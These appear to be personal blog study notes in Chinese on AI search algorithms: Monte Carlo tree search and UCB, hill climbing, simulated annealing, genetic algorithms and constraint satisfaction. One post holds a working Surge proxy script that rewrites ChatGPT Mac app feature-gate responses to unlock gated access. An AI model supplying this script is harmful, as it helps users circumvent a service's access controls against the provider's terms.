  3. 难以确定搜索深度,则可以采用迭代加深的方法。在时间允许范围内逐步加深搜索深度,直到到达时限

状态估值函数:

  1. 可以采用经验定义,或者机器学习的方法
  2. 搜到终局的时候必须采用真的得分,否则返回估计值
  3. 状态估值函数影响决策好坏
  4. 可用于 子节点排序,提升 Alpha-Beta 剪枝的效率

蒙特卡洛树搜索

蒙特卡洛方法(Monte Carlo method)是一种 统计模拟 方法,通过大量采样来获得概率估计。这种方法依赖于概率论中的大数定律,即大量重复实验的平均结果将接近于某个确定值。其 不是 一个严格意义上的算法。

大数定律:

$$ \lim_{n \to \infty} \frac{1}{n} \sum_{i=1}^{n} X_i = E(X) $$

特点:统计方法,计算能力越强,性能越好。

优点:即使在没有领域知识的情况下也能使用。因为它绕过了人为设定好的状态估值函数这一困难很大的步骤,而是基于大量的随机采样来估计状态的价值。

纯随机蒙特卡洛方法

先前的决策方法依赖于状态估值函数的设计,但是很难设计一个好的状态估值函数。

所以,我们可以直接进行对弈模拟(双方策略都是随机下),即在决策空间中随机采样,根据采样的结果来评估状态价值(如计算平均胜率),然后据此来排序子节点。

纯随机蒙特卡洛方法正是采用了上述模拟思想,运用 随机搜索 策略,通过大量随机模拟来估计当前状态的价值。

通过这种方式,纯随机蒙特卡洛方法能够有效地在复杂搜索空间中找到较优解,而无需人为设计的状态估值函数。

算法过程

mcts_algorithm

  1. 节点选择:在当前节点下,存在 N 个可能的后继儿子节点。
  2. 估值计算
    • 对每个儿子节点进行 M 次随机搜索。
    • 每次搜索中,敌我双方均采用随机动作,直至终局。
    • 通过 M 次搜索的结果,计算每个儿子节点的平均胜率。
  3. 决策:选择胜率最高的儿子节点作为下一步的行动。

缺点

  • 内存利用不足:该方法未充分利用内存资源。
  • 准确性问题:除非 M(搜索次数)非常大,否则估值可能不够准确。
  • 重复搜索:该方法可能导致大量重复状态的搜索,影响效率。

蒙特卡洛树搜索

蒙特卡洛树搜索(Monte Carlo Tree Search,MCTS)也是一种通过在决策空间中(模拟)随机采样,并根据结果 构建搜索树 来在给定域中寻找最优决策的方法。

与前文纯随机的蒙特卡洛算法不同,MCTS 结合了 树搜索,能够 记住之前的模拟结果,并利用这些信息来指导未来的搜索,从而避免无效的重复搜索并专注于更有前景的分支。

换句话说,他不会在一条分支下无限下探,在对一条分支的搜索中,他会不断地更新这条分支的价值,一旦其他分支的价值更高,它会转向搜索其他分支。

而纯随机的蒙特卡洛算法直接就没有搜索树的概念,它就是直接暴力模拟所有可选动作,然后选择胜率最好的那个。

mcts_search_tree

算法过程

  1. 选择(Selection):从 根节点 开始,使用子节点 树策略 递归向下选择节点,直到找到一个非终止且未访问的子节点。
  2. 扩张(Expansion):根据可选择的动作,添加一个或多个子节点来展开树。
  3. 模拟(Simulation):从被选择的节点开始,使用 默认策略 进行动作选择和状态转换,直到达到终止状态。蒙特卡洛搜索树会根据模拟结果进行更新。
  4. 反向传播(Backup):更新与被选择节点及其祖先节点相关的统计信息。

树策略(Tree Policy)与默认策略(Default Policy)

树策略 是蒙特卡洛树搜索(MCTS)中用于 选择下一个要模拟的节点 的策略,其核心在于平衡探索(Exploration)和利用(Exploitation):

  • 探索:旨在检查尚未充分了解的区域,以发现新的可能性。
  • 利用:侧重于使用已知且预期效果最佳的区域,以优化当前的选择。

这种平衡确保了搜索过程既能发现新的策略,又能有效利用已知信息。

树策略不一定是完全只看模拟胜率的贪心!

树策略:负责在蒙特卡洛树搜索(MCTS)的 选择和扩张 阶段,从现有的搜索树中选择节点并创建新的叶节点。这一过程是基于当前树的状态和可能的未来收益来决定路径的。

默认策略:在 模拟阶段 发挥作用,它从一个非终止状态开始,通过不断模拟游戏直至结束,从而得到一个价值评估。这个评估帮助 MCTS 确定哪些路径可能更有价值。默认策略是对原先状态估值函数的替换。

UCT 算法

UCT(Upper Confidence Bound for Trees)算法是一种蒙特卡洛树搜索(MCTS)的变种,它使用 置信上界 来平衡探索和利用。UCT 算法的核心思想是 在选择节点时,优先选择置信上界最高的节点

uct_pesudo_code

可以看到,这里实际上有时间 / 步数限制的,实际上搜索得越久、估值越准。

uct_pesudo_code_2

可以发现,如果一个节点是非终止状态,那么:

  1. 如果存在未访问过的子节点,那么优先展开未访问过的子节点
  2. 如果子节点都探索过了,使用 BestChild 算法来获得一个子节点,移动到这个子节点,然后继续递归循环

循环终止的条件是下列之一:

  1. 找到一个完全未探索的子节点
  2. 当前节点是终止状态

注意到循环条件中,1 比较容易满足,而 2 对于对局很深的游戏几乎不可能满足,所以说实际运算时,其实无法将整棵搜索树完整地构建出来。只需建出访问过的节点所构成的这部分搜索树,并在需要访问子节点时 计算出应该访问哪一个就行 (先用几次 BestChild 然后根据 1 返回一个未被展开过的节点,继续探索)

uct_pesudo_code_3

对于终止状态,采用默认策略来进行模拟,然后进行反向传播更新搜索树。

UCB 公式

UCB 公式是用于在 MCTS 中选择最佳子节点的,即 BestChild 函数中的计算方法。UCB 的目的是在探索和利用之间找到平衡。

其可以表示为:

$$ \text{UCB} = \frac{Q(v')}{N(v')} + c \sqrt{\frac{2 \ln N(v)}{N(v')}} $$

$\frac{Q(v')}{N(v')}$ 代表 利用(exploitation),即节点 $v'$ 的平均价值,其中 $Q(v')$ 是节点 $v'$ 的总价值(例如,获胜的次数),$N(v')$ 是节点 $v'$ 被访问的次数。这一项反映了节点 $v'$ 当前的表现,鼓励算法利用已知的好走法

$c \sqrt{\frac{2 \ln N(v)}{N(v')}}$ 代表 探索(exploration),其中 $c$ 是探索参数,$N(v)$ 是父节点 $v$ 的访问次数。这一项 鼓励算法探索那些访问次数较少的节点

BestChild 函数中,算法会遍历所有子节点 $v'$​​,计算每个节点的 UCB 值,并选择 UCB 值最大的节点作为最佳子节点。这样,算法就能在已知的好走法和潜在的未知走法之间进行权衡,从而有效地进行树的搜索。

参考

ouuan / 蒙特卡洛树搜索(MCTS)学习笔记:强推,讲的 MCTS 应该比我这篇好。

💾

局部搜索和优化

2024年5月19日 23:32

局部搜索算法

全局搜索回顾

  • 全局搜索:从初始状态出发,遍历整个动作序列空间寻找目标状态。全局搜索需要记住搜索路径,受到内存限制,不适合解决超大规模问题
  • 无信息搜索:盲目遍历整个动作序列空间。
  • A*:使用问题相关的启发式函数加快搜索。

局部优化

为了快速解决 100+ 皇后问题,我们不再寻找全部解,而是 只找一个可行解

我们不再关心得到解的路径(如,先摆第一个,再摆第二个...),只需要得到解(只要最后是解就行)。我们将启发式函数被改成状态估值函数,并充分利用它来寻找解。

全局搜索:对整个状态空间搜索,从初始状态开始(摆了零个)。利用摆皇后这个动作进行状态转移(动作确定路径),从摆了 $n$ 个变到摆了 $n+1$​ 个

局部调整:先将八个皇后随意摆放到棋盘的八列上,然后调整被攻击的皇后,直到八个皇后互不攻击

八皇后问题重新建模

  • 初始状态 $S_0$:八个皇后在棋盘上,每列有一个皇后。因为如果 8 个皇后不相互攻击,那么 8 个皇后肯定是在不同列的。
  • 动作:移动任意列上的皇后到同列其他行(每个皇后有 7 个可能的动作,8 个皇后一共有 $8 \times 7 = 56$ 种可能动作)。
  • 状态转移:移动后棋盘的样子( 邻居 状态,注意不再是父子状态,它们是 并行 关系,56 个)。
  • 目标状态:皇后不互相攻击。
  • 状态估值函数 $h$:互相攻击的皇后对的数目,表示当前状态的好坏。如果两个皇后可以相互攻击,则 $h$ 加 1。$h(S)$ 以当前状态 $S$ 为输入,输出一个评估值。

优化目标

目标:使估值函数 $h$ 最小化,目标是 $h=0$。

策略:不断地将当前状态移动到邻居状态中估值更低(或者更高)的位置。直到到达目标状态。

优化过程

基本思路:从一个初始状态出发,不断地向更好的邻居状态移动

算法终止:当邻居状态中没有比当前状态更好的状态时(也即来到了 局部极值点 ),算法终止。

最优性条件局部最优解不一定是全局最优解,但是局部最优解是全局最优解的一个 可能解。如果全局只有一个极值点,那么局部最优解就是全局最优解。

解空间的形状

solution_space

假设状态是一个连续变化的值,X 轴表示状态 $x$,Y 轴表示评估值 $f(x)$。对于一维的情况,评估值变化与各概念的关系如上图所示。

  • 局部极值:某个区域内,某个点的评估值最高(或最低)。

    多个局部极值点存在时,贪婪策略最终到达的极值点取决于 初始状态

  • 全局最优:全局最优解是所有局部最优解中评估值最高(或最低)的解。

  • 平台:邻近状态评估值相同,无法决定移动方向。

  • 肩状平台:一侧评估值可上升,另一侧下降。

实际情况中,状态的维度会更高(甚至无法可视化)。

解空间形状带来的问题

如何跳出局部极值点而奔向全局最优点?

进入平台时如何解决?

这些在后文都会有介绍。

局部优化算法的完备性和最优性

  • 完备性:如果目标存在,则算法总能找到。
  • 最优性:算法能找到全局最优解。

爬山法(Hill Climbing)

爬山法是一种局部搜索算法,主要用于求解优化问题。

以下是几个主要版本及其特点:

最陡下降爬山法(Steepest-Ascent Hill-Climbing)

算法

  • 每次选择相邻节点中评估值 最优(这暗示最陡) 的一个,移动到该节点。
  • 算法会在一个 山峰 (即四周点的评估值都比它低,局部最优值 )处停止。
  • 不存储搜索树,只存储 当前节点 和一个 估值函数

伪代码

$$ \begin{array}{l} \textbf{function} \ \text{HILL-CLIMBING}(problem) \ \textbf{returns} \ \text{a state that is a local maximum} \ \quad \text{// 初始化当前节点为问题的初始状态} \ \quad \text{current} \leftarrow \text{MAKE-NODE}(problem.\text{INITIAL-STATE}) \ \quad \text{loop do} \ \quad \quad \text{// 找到当前节点的最高值后继节点} \ \quad \quad \text{neighbor} \leftarrow \text{a highest-valued successor of current} \ \quad \quad \text{// 如果邻居节点的值不大于当前节点的值,则返回当前节点的状态} \ \quad \quad \text{if neighbor.VALUE} \leq \text{current.VALUE then return current.STATE} \ \quad \quad \text{// 更新当前节点为邻居节点} \ \quad \quad \text{current} \leftarrow \text{neighbor} \ \end{array} $$

  1. 将初始状态设置为当前状态。
  2. 循环:
    • 找出当前状态下估值最大的邻居节点。
    • 如果邻居节点的估值小于当前状态,则返回当前状态作为解(这代表当前状态是局部最优解)。
    • 否则,将当前状态更新为邻居节点。

优点:内存开销小,只需要存储当前状态。

缺点:可能陷入 局部最优

local_optimum

优化:随机平移

随机选择一个估值函数的值相同的邻居节点,尝试跳出局部最优。需要设置一个 移动次数上限,避免死循环。

只能跳出 肩状平台 (一侧),无法跳出整体平台。

随机爬山法(Stochastic Hill-Climbing)

算法

  • 更优 的邻居点中 随机选择一个 进行移动,而 不是选择最优点 (那就是最陡爬山法了)。
  • 比最陡下降爬山法 收敛慢,但在某些空间中 可能找到更优的解
  • 选择概率可以根据陡峭程度设定,以加速收敛。

第一选择爬山法(First-Choice Hill-Climbing)

过往缺陷

最陡爬山和随机爬山法都要计算所有邻居的估值,也即 生成估值表,当邻居很多的时候,需要的计算量很大。

第一选择爬山法通过每次只计算一个状态来避免此问题。

算法

  • 随机选择一个邻居,如果它比当前状态好,就立即移动到邻居状态。否则,继续随机选择邻居,直到找到一个比当前状态好的邻居。
  • 不需要生成估值表,每次只需要计算一个状态的估值。

随机重启爬山法(Random-Restart Hill-Climbing)

过往缺陷

之前的算法都是 不完备 的,因为可能陷入局部最优。

随机重启爬山法通过选择多个随机初始状态(类似暴力算法)来在一定程度上解决这个问题(没有完全解决),多次尝试寻找最优解,达到 近乎完备

算法

  • 找不到解时,从随机位置重新开始

  • 多次随机产生初始状态,接近完备,因为总会有一个初始状态能找到解(还有可能直接初始化到了解的位置(bushi))。

成功与否 取决于状态空间的形状,如果局部极值和平台不多,能快速找到好的解。

如果一次就找到最优解成功率是 $p$,那么期望的重启次数是 $1/p$。

模拟退火算法

过往问题

  1. 爬山法:只向更优邻居点移动,不会向状态估值更差的邻居移动,可能 陷入局部极值,因此是不完备的。

  2. 纯粹的随机游走算法

    • 不使用 $h(n)$ 的搜索算法。
    • 等概率地向任何一个邻居移动,是 完备 的,但却是 非常低效的

从而,我们想到是否可以适当的结合两种算法,利用爬山法加快搜索,利用随机游走算法的随机性提高完备程度。

仿照物理中的退火,我们提出如下思想:

  • 在搜索的初期以一个较大概率允许向下走
  • 这个概率和这一步 “坏” 的程度成指数关系。
  • 随着时间的推移这个概率会变小,这个概率会随着 “温度” 的下降而下降。

我们可以设法让 “温度” 足够慢地下降,此时算法会最终以接近 1 的概率找到全局最优解(因为这样会很接近随机游走算法)。

伪代码

$$ \begin{array}{l} \textbf{function} \ \text{SIMULATED-ANNEALING}(problem, schedule) \ \textbf{returns} \ \text{a solution state} \ \quad \text{// 输入: problem,一个问题} \ \quad \text{// schedule,一个从时间到“温度”的映射} \ \ \quad \text{// 初始化当前节点为问题的初始状态} \ \quad current \leftarrow \text{MAKE-NODE}(problem.\text{INITIAL-STATE}) \ \quad \textbf{for} \ t = 1 \ \text{to} \ \infty \ \textbf{do} \ \quad \quad \text{// 根据时间 t 计算当前温度} \ \quad \quad T \leftarrow \text{schedule}(t) \ \quad \quad \textbf{if} \ T = 0 \ \textbf{then return} \ current \ \quad \quad \text{// 随机选择当前节点的一个后继节点} \ \quad \quad next \leftarrow \text{a randomly selected successor of} \ current \ \quad \quad \text{// 计算邻居状态和当前状态的估值差异} \ \quad \quad \Delta E \leftarrow \text{next.VALUE} - \text{current.VALUE} \ \quad \quad \text{// 如果邻居状态更好,直接跳到邻居状态} \ \quad \quad \textbf{if} \ \Delta E > 0 \ \textbf{then} \ current \leftarrow next \ \quad \quad \text{// 否则,以 $e^{\Delta E / T}$ 的概率接受新的节点} \ \quad \quad \textbf{else} \ current \leftarrow next \ \text{only with probability} \ e^{\Delta E / T} \ \end{array} $$

  • 温度:表示为 $T$,随着时间 $t$ 的变化而变化。

  • ΔE:表示邻居状态值与当前状态值的差。

  • 概率跳跃:以概率 $e^{\Delta E / T}$​ 决定是否跳跃到新的邻居状态。

    • $T$ 在指数分母上,随着时间增加跳跃概率越来越小。

    • $\Delta E$ 在指数分子上,跳跃概率为随着 $\Delta E$ 的增加而增加。

      当 $\Delta E$ 为正时,直接跳跃到新的邻居状态。这对应邻居估值高于当前状态,跳过去是优化的。

      当 $\Delta E$ 为负时,跳跃概率为 $e^{\Delta E / T}$​,跳跃概率随着温度的降低而降低。这对应跳过去是非优化的。这样看上去会更差,但是正是因为在非优化的情况下还有概率选择跳跃,所以模拟退火算法能够跳出局部最优,增加达到全局最优的可能。

超参数(Hyper-parameters)选择

  • 初始温度(步幅):应设定多大?
  • 降温速率:以何种速率降低温度?
  • 终止温度:温度降到什么程度可以报告解?

具体问题具体分析:根据具体问题调整超参数。

总结

  • 初期允许以较大概率向下走,概率与 “坏” 的程度成指数关系。

  • 随时间推移,概率变小,温度下降。

若温度足够慢地下降,算法会最终以 接近 1 的概率找到全局最优解

对比

爬山法与模拟退火法对比:

  • 爬山法:简单搜索法,可能陷入局部最优。
  • 模拟退火:通过概率跳跃机制,有效跳出局部极值,寻找全局最优解。

内存开销:这两个算法都只记录当前节点(而不是像之前的全局搜索的搜索树一样记录很多的节点状态),内存不会随着时间增加。

不过,这也是缺点,因为没法很好的利用内存来加快搜索。

局部束搜索(Local Beam Search)

算法过程

  1. 从 $k$ 个随机生成的初始状态开始。
  2. 每一步,所有 $k$ 个状态各自生成后继,共有 $k \times b$ 个后继。
  3. 若 $k \times b$ 个后继中有一个是全局最优点,则算法结束。否则,从 $k \times b$ 个后继中找出 $k$ 个最好的后继作为新状态,继续算法。

比较

局部束算法不同于同时运行的多个随机重启爬山法。

  • 同时运行的多个随机重启爬山法:各搜索独立进行,不通讯
  • 局部束搜索:第 3 步中选择最优的 $k$ 个后继作为新状态,这些状态间相互通讯。如果一个状态找到多个好的后继,会告知其他状态一同继续搜索。

问题

基础版本的局部束搜索易于聚集到状态空间中的一个小局部区域,缺乏多样性,使得在寻找更优解方面与爬山法相似,容易陷入局部极值点

缓解方案

一种变种是 随机束搜索(Stochastic Beam Search),类似于随机爬山法,能减轻陷入局部极值点的问题。随机束搜索不再选择 $k$ 个最好的后继,而是根 据一个函数计算出与后继优劣程度相关的值,并以此为概率选择 $k$ 个后继。

随机束搜索类似于 “自然选择法则”:适者生存概率高,不适者死亡概率高。

遗传算法(Genetic Algorithms)

遗传算法是 随机束算法 的一个变种。与单个状态产生后继节点不同,遗传算法的后继节点是由 两个父状态结合 产生的。这类似于父母生成孩子的过程,因此称为遗传算法。

genetic_algorithms

genetic_algorithms_2

伪代码

genetic_pesudo_code

主要特点

后代多样性大:遗传算法类似于 高级生物的有性繁殖后代多样性大,变异概率高,不易陷入局部最优

注意,这也同时导致了遗传算法的不稳定性。

遗传算法结合了 爬山法随机探索,并在并行的搜索线程中交换信息。

  • 交换子串 是遗传算法的主要优点,可以将优秀的功能块组合起来,提高后代的质量。
  • 数学上,如果父代编码是随机的,交叉并不会带来好处。
  • 直觉上,交叉可以将 具有良好功能的块 组合在一起,从而产生更好的下一代。

模式与状态

  1. 模式 Schema:在遗传算法中,模式(Schema)指的是一种部分子串,可以包含特定位置的固定值,也可以有任意值。例如,在一个二进制字符串中,模式 1*0 表示以 1 开头,以 0 结尾,中间的位可以是 0 或 1。

  2. 模式的优越性:如果一个模式在群体中表现得比平均水平好,那么这个模式会更有可能通过遗传操作(选择、交叉、变异)传递给下一代。这意味着,具有这种模式的个体数量会在后代中增加。

  3. 良好模式的积累:当一个模式能够很好地表达问题中的重要特征时,遗传算法的表现会更好。

  4. 状态的良好表达:为了使遗传算法表现良好,问题的状态需要被良好地表达。这意味着在编码方案中,重要特征和模式需要被明确地表示出来,以便遗传算法能够有效地选择和遗传这些特征。

连续空间中的局部搜索

例子:地图上新建机场

目标: 在地图上新建三个机场,使每个城市与离它最近的机场的距离的平方和最小。

状态空间: 每个机场的坐标 $(x_1, y_1), (x_2, y_2), (x_3, y_3)$。这是一个六维空间。

目标函数:

$$ f(x_1,y_1,x_2,y_2,x_3,y_3)=\sum_{i=1}^3\sum_{c\in C_i}[(x_i-x_c)^2+(y_i-y_c)^2] $$

其中 $C_i$ 表示离机场 $i$ 最近的城市集合。目标是使 $f$ 最小。

离散化方法

通过将地图坐标离散化来解决连续问题。

  • 每次移动一个机场的 $x$ 或 $y$ 坐标 $±δ$, $δ$ 越小,精度越高。
  • 每个机场的当前状态有 12 个可能的邻居状态。

局部搜索算法

  • 状态: $(x_1, y_1, x_2, y_2, x_3, y_3)$
  • 评估函数: $f(x_1, y_1, x_2, y_2, x_3, y_3)$
  • 邻居: 一个机场的($x_i$ 或 $y_i$ $±\delta$)

建模

  • 初始状态: $S_0 = (x_1, y_1, x_2, y_2, x_3, y_3)$,随机位置
  • 动作: 任何一个 $x_i$ 或 $y_i$ 都可以 $\pm\delta$(12 个合法动作)
  • 状态转移: 采取动作后的位置(转移到 12 个邻居状态之一)
  • 目标状态: 使得 $f(x_1, y_1, x_2, y_2, x_3, y_3)$ 最小的 $x, y$ 取值
  • 状态估值函数: $h = f(x_1, y_1, x_2, y_2, x_3, y_3)$

注意事项

  • 可以使用前面介绍的任何局部搜索算法,例如爬山算法、模拟退火算法等。
  • 离散化精度($δ$)会影响搜索结果的准确性。
  • 需要考虑如何处理多个机场同时移动的情况。

优化方法

  1. 爬山 / 随机爬山 / 模拟退火

  2. 梯度下降 / 上升:

    若函数可微,可以借助梯度信息来更新(而不需要求具体的离散后的邻居的估值):

    $$ x\leftarrow x\pm\nabla f(x) $$

    其中:

    • $\alpha$ 是学习率 / 步长

      • 如果 $\alpha$​ 太小,需要太多的步骤、更新慢
      • 如果 $\alpha$ 太大,搜索可能会越过极值点
    • $\nabla f(x)$ 是梯度

    • $\pm$ 对应不同的优化方向。

    若估值函数不可微,则使用 经验梯度 的值法

和在离散空间一样,在连续空间里,局部搜索算法的最大难题仍是 局部极值和平台。为此,采用和离散空间一样的随机重启和模拟退火经常是有效的。

最小化冲突算法

最小化冲突算法用以解决 约束满足问题(CSP)

约束满足问题(CSP, Constraint Satisfaction Problem):在一组变量和一组约束条件下寻找一个变量赋值的过程,使得所有变量满足给定的约束条件。

CSP 的细节在后文讨论。

最小化冲突算法伪代码

$$ \begin{array}{l} \text{// 定义函数 MIN-CONFLICTS,输入为约束满足问题 csp 和最大步数 max_steps,返回一个解或失败} \ \textbf{function} \ \text{MIN-CONFLICTS}(csp, max_steps) \ \textbf{returns} \ \text{a solution or failure} \ \quad \text{// 输入:csp,一个约束满足问题} \ \quad \text{// max_steps,放弃前允许的最大步骤数} \ \quad \text{// current 是 csp 的一个初始完全赋值} \ \quad \text{current} \leftarrow \text{an initial complete assignment for } csp \ \quad \text{// 从 1 到 max_steps 进行循环} \ \quad \textbf{for} \ i = 1 \ \textbf{to} \ max_steps \ \textbf{do} \ \quad \quad \text{// 如果 current 是 csp 的一个解,则返回 current} \ \quad \quad \textbf{if} \ current \ \textbf{is a solution for} \ csp \ \textbf{then return} \ current \ \quad \quad \text{// var 是从 csp.VARIABLES 中随机选择的一个冲突变量} \ \quad \quad \text{var} \leftarrow \ \text{a randomly chosen conflicted variable from } csp.\text{VARIABLES} \ \quad \quad \text{// value 是使 CONFLICTS(var, v, current, csp) 最小的 var 的值 v} \ \quad \quad \text{value} \leftarrow \ \text{the value } v \ \text{for } var \ \text{that minimizes CONFLICTS}(var, v, current, csp) \ \quad \quad \text{// 在 current 中设置 var = value} \ \quad \quad \text{set } var = value \ \text{in } current \ \quad \text{// 如果循环结束仍未找到解,则返回失败} \ \quad \textbf{return} \ \text{failure} \end{array} $$

八皇后问题的 CSP 建模

我们可以通过以下步骤将八皇后问题建模为一个 CSP:

  1. 变量定义:定义 8 个变量,每个变量表示一个皇后的位置。通常用 $Q_i$ 表示第 $i$ 行上的皇后所在的列位置。
  2. 变量取值范围:每个变量 $Q_i$ 的取值范围是 ${1, 2, 3, 4, 5, 6, 7, 8}$,表示皇后可以放在第 $i$ 行的任意一列。
  3. 约束条件
    • 不同变量取值不同:即 $Q_i \neq Q_j$ (不同的皇后不能在同一列)。
    • 不在同一对角线:即 $|Q_i - Q_j| \neq |i - j|$(不同的皇后不能在同一对角线上)。

算法

  1. 初始化:随机放置 8 个皇后,使其符合所有行和列约束。
  2. 冲突检测:计算当前放置下的冲突数,即有多少对皇后彼此攻击。
  3. 冲突最小化:通过移动某个皇后减少冲突。例如,选择冲突最多的皇后,尝试移动到其他列,看哪个位置的冲突最少。
  4. 迭代:重复冲突检测和最小化,直到没有冲突(即找到解)或达到预定的最大迭代次数。

约束满足问题 CSP

约束满足问题将一个系统和它的状态当作一个整体,寻找状态解。

  • 一个约束满足问题有三个组成部分,$X$,$D$ 和 $C$:

    • $X$ 是 变量,${X_1, X_2,..., X_n}$。
    • $D$ 是 值域,${D_1,..., D_n}$,每个变量一个值域(取值范围)。
    • $C$ 是 约束,用于描述变量取值之间的关系。
  • 每个值域 $D_i$ 包含一组对于变量 $X_i$ 可行的取值 ${V_{i_1},..., V_{i_m}}$;每个约束条件 $C_j$ 包含一对数值 $\langle scope, rel\rangle$,$scope$ 是约束条件中涉及的变量,$rel$ 定义了变量的取值范围之间的关系。

CSP 问题的解

  • 在 CSP 问题中,令每个变量一个取值,${X_1=v_1, X_2=v_2,...}$,如果 不违背任何一个约束条件,则称为这个 CSP 问题的一个 可行解。可能存在多个可行解。
  • 如果我们给定一个解的评价方式,则我们还可以寻找一个 最优解最优解不一定是可行解,但是 是可以找到的最好的解

在实际约束问题中,我们可能需要寻找:

  1. 一个可行解
  2. 全部可行解
  3. 一个最优解

把问题建模成约束满足问题 CSP 的原因

  • 表示能力强:CSP 可以表示很宽泛的类别的问题。设计通用 CSP 求解器,使用 自动优化技术 迅速排除大量的无关搜索空间,比基于状态空间的搜索算法更快。

  • 可解释性:CSP 的约束条件使得我们容易知道为什么某个赋值不是解(违背了哪个约束),并可以立即放弃对当下路径后续探索。

许多使用传统方法不能解出的问题,建模成 CSP 问题可以很快地解出。

CSP 模型变量的类型

变量 $X$:类型可以是 离散的,也可以是 连续的

值域 $D$:可以是 有限的,也可以是 无限的

离散类型变量的取值 也可以是 无限的,例如 整数,或者是 字符串

CSP 约束条件的类型

用 C 描述约束的量来对其分类

  • 一元约束 (unary constraint):针对单个变量取值的约束。
  • 二元约束 (binary constraint):涉及到两个变量。
  • 三元约束 (ternary constraint):例如,变量 $Y$ 的取值要在变量 $X$ 和 $Z$ 之间,表示成三元约束,Between $(X,Y,Z)$。
  • 全局约束 (global constraint):含有任意多个变量,最常见的全局约束是 All diff,其含义是所有变量的取值必须互不相同。

用 C 是否是强制性的来分类

  • 绝对约束:违背这种约束意味着排除了成为解的可能性。

  • 优先约束 (preference constraints):用来描述哪些是优先选择的,可用表示求最优解。这意味着,满足这个约束越好,获得的解就越好。

    优先约束一般会实现为给每个变量的取值增加一个代价(costs),这样,含有优先约束的 CSP 问题就称为约束优化问题(constraint optimization problem),简称 COP。

约束传播:CSP 中的推理

在普通的状态空间搜索中,我们能做的事情 只有搜索

而在 CSP(约束满足问题)中,除了搜索,还可以进行 推理(也称为约束传播)

约束传播:通过使用约束来 减少一个变量的可能取值,从而减少其他变量的可能取值。约束传播可以与搜索相结合,也可以先进行约束传播的预处理,然后再进行搜索。

有时,预处理就可以解决全部问题,不用再进行搜索。

点一致

点一致指变量的所有取值都满足一元约束。通过点一致性算法去除不满足一元约束的取值。

例:如果 $X$ 的取值范围是 ${1, 2, 3}$,且有约束 $X \neq 2$,那么经过点一致处理后,$X$ 的取值范围变为 ${1, 3}$。

边一致

边一致指变量的所有取值都满足二元约束。

例:如果 $X$ 和 $Y$ 的取值范围分别是 ${1, 2}$ 和 ${2, 3}$,且有约束 $X < Y$,那么经过边一致处理后,$X$ 的取值范围变为 ${1}$,$Y$ 的取值范围变为 ${2, 3}$​。

我们称一个 网络是边一致 的,如果每个变量相对于 其他任意变量 都是边一致的。

约束传播的应用

使用约束传播可以去除不合理的解,从而缩小值域,提高解决问题的效率。

约束满足问题的通用求解方法

  • 通用约束求解器:如 MiniZink
  • 自动生成求解程序:如 PDL2C

💾

Surge 过 ChatGPT Mac 认证

2024年5月14日 19:10

下载

ChatGPT_Desktop_public_latest.dmg

activator.js

在 Surge 配置文件的同目录下创建一个 activator.js,内容如下:

'use strict'

function hackOpenAiMacApp() {
  let body = JSON.parse($response.body)
  console.log(body)
  for (let key in body.feature_gates) {
    if (body.feature_gates[key].value === false) {
      body.feature_gates[key].value = true
    }
  }
  $done({
    body: JSON.stringify(body)
  })
}

const activator = {
  chatgpt: {
    base: 'https://ab.chatgpt.com/v1/initialize',
    activate: {
      base: '*',
      func: hackOpenAiMacApp
    }
  }
}

const url = $request.url
/**
 * Determine whether the URL matches the base
 */
function isMatchBase(url, base) {
  if (Array.isArray(base)) {
    for (let item of base) {
      if (url.includes(item)) {
        return true
      }
    }
    return false
  }
  return url.includes(base)
}
/**
 * Automatic execution of the corresponding function according to the URL
 */
function launch() {
  for (let module in activator) {
    if (isMatchBase(url, activator[module].base)) {
      for (let key in activator[module]) {
        if (key === 'base') continue
        if (Array.isArray(activator[module][key])) {
          for (let custom of activator[module][key]) {
            // 检查 custom.base 是否为通配符 '*',如果是,则匹配任何以 activator[module].base 开头的URL
            if (custom.base === '*' && url.startsWith(activator[module].base)) {
              return custom.func()
            }
            // 否则,检查精确匹配
            else if (url === `${activator[module].base}/${custom.base}`) {
              return custom.func()
            }
          }
          continue
        }
        if (typeof activator[module][key] === 'object') {
          if (activator[module][key]['base'] === '*' && url.startsWith(activator[module].base)) {
            return activator[module][key].func()
          }
          if (url === `${activator[module].base}/${activator[module][key].base}`) {
            return activator[module][key].func()
          }
        } else if (!url.includes(`${activator[module].base}/${key}`)) {
          continue
        }
        if (typeof activator[module][key] === 'function') {
          return activator[module][key]()
        }
      }
    }
  }
  console.log(`[activator] ${url} is not matched`)
  console.log(`[activator] returnDefaultResponse: ${url} - ${$request.method.toLowerCase()}`)
  $done({})
  return
}

launch()

Script 块

修改 Surge 配置文件中的 [Script] 块,添加如下一行:

OpenAI-activate-ab.chatgpt.com = type=http-response,pattern=^https://ab.chatgpt.com/v1/initialize,requires-body=1,max-size=0,debug=1,script-path=activator.js

Credit

https://twitter.com/NickADobos/status/1790172043117486212

💾

用搜索解决问题

2024年5月12日 14:48

问题的定义与解

各种搜索算法通常先把问题转化为通用的模型表示(让计算机看懂),然后进行求解。

一个问题的定义包含五个部分(他们共同组成了一个五元组):

  1. 初始状态 $S_0$

  2. 可选动作 $a$

    在一个给定状态 $s$,$\text{ACTIONS}(s)$ 返回在这个状态下的一组可能的动作 $a$。

  3. 状态转移模型

    状态转移模型指定了状态之间的转移关系。

    在状态 $s$ 下执行动作 $a$ 之后所到达的状态用 $s' = \text{RESULT}(s,a)$ 表示。一个状态经过一个动作后来到的下一个状态我们称之为 后继状态 $s'$​。

    初始状态、动作、状态转移模型构成了 状态空间。状态空间构成一幅 有向图

    路径 是从一个状态出发通过一系列动作所经过的状态序列。

  4. 目标状态

    一个问题的目标状态 / 终止状态是一个或多个特定的状态,我们希望通过搜索找到这些状态。

  5. 路径花费

    每条路径可以有一个花费,用来度量解的好坏。通常来说,花费越小越好。

在上述五元组内,前四个已经足以构筑出一颗 搜索树。第五个可以用以辅助构建搜索树,从而使得搜索更容易到达目标状态。

一个问题的解 是从初始状态出发到达目标状态的一个动作序列。解的质量可以用路径的花费来度量。

最优解:所有解中花费最小的一个。

建模

建模很重要,适当的建模可以通过剪枝来减少搜索空间,通过启发式函数来加速搜索。

如八皇后问题中,有如下两种建模方式:

  1. 初始状态:棋盘上没有皇后

    可选动作:在棋盘上的所有空位置之一放置一个皇后

    状态转移模型:放置一个皇后之后棋盘的状态

    目标:8 个皇后都在棋盘上,互相之间不能攻击

    状态空间:每个状态是一个棋盘布局

  2. 初始状态:棋盘上没有皇后

    可选动作:是在棋盘上的最左一个空列上放置一个皇后,使她不被已有的皇后攻击。

    状态转移模型:放置一个皇后之后棋盘的状态

    目标:8 个皇后都在棋盘上,互相之间不能攻击

    状态空间:每个状态是一个棋盘布局
